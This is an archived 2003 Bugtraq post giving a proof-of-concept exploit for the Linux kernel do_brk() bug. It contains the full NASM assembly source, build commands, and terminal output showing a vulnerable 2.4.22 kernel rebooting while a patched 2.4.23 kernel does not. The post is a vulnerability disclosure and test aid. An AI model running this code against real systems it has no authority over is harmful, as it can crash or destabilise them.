lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <Pine.VMS.3.91-b11-vms.1031202031221.13520A-100000@speedy.iie.cnam.fr>
Date: Tue, 2 Dec 2003 03:16:57 +0000
From: Christophe Devine <DEVINE@....cnam.fr>
To: bugtraq@...urityfocus.com
Subject: Linux kernel do_brk() proof-of-concept exploit code




The following program can be used to test if a x86 Linux system
is vulnerable to the do_brk() exploit; use at your own risk.

$ nasm brk_poc.asm -o a.out
$ chmod 755 a.out

$ uname -a
Linux test3 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unknown unknown GNU/Linux
$ ./a.out &
[1] 1698
$ cat /proc/`pidof a.out`/maps
bffff000-c0000000 rwxp 00000000 03:03 376860     /tmp/a.out
c0000000-c0003000 rwxp 00000000 00:00 0

(system reboots when the program exits)

$ uname -a
Linux test3 2.4.23 #1 Mon Dec 1 22:18:25 CET 2003 i686 unknown unknown GNU/Linux
$ ./a.out &
[1] 1591
$ cat /proc/`pidof a.out`/maps
bffff000-c0000000 rwxp 00000000 03:03 376860     /tmp/a.out

(the program exits gracefully)

$ cat brk_poc.asm

  ; ref.: http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html

  BITS 32

                org     0xBFFFF000

  ehdr:                                                 ; Elf32_Ehdr
                db      0x7F, "ELF", 1, 1, 1            ;   e_ident
        times 9 db      0
                dw      2                               ;   e_type
                dw      3                               ;   e_machine
                dd      1                               ;   e_version
                dd      _start                          ;   e_entry
                dd      phdr - $$                       ;   e_phoff
                dd      0                               ;   e_shoff
                dd      0                               ;   e_flags
                dw      ehdrsize                        ;   e_ehsize
                dw      phdrsize                        ;   e_phentsize
                dw      1                               ;   e_phnum
                dw      0                               ;   e_shentsize
                dw      0                               ;   e_shnum
                dw      0                               ;   e_shstrndx

  ehdrsize      equ     $ - ehdr

  phdr:                                                 ; Elf32_Phdr
                dd      1                               ;   p_type
                dd      0                               ;   p_offset
                dd      $$                              ;   p_vaddr
                dd      $$                              ;   p_paddr
                dd      filesize                        ;   p_filesz
                dd      0x4000                          ;   p_memsz
                dd      7                               ;   p_flags
                dd      0x1000                          ;   p_align


  phdrsize      equ     $ - phdr

  _start:

                mov     eax, 162
                mov     ebx, timespec
                int     0x80

                mov     eax, 1
                mov     ebx, 0
                int     0x80

  timespec      dd      20,0

  filesize      equ     $ - $$

-- 
Christophe Devine - http://www.cr0.net:8040/about/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ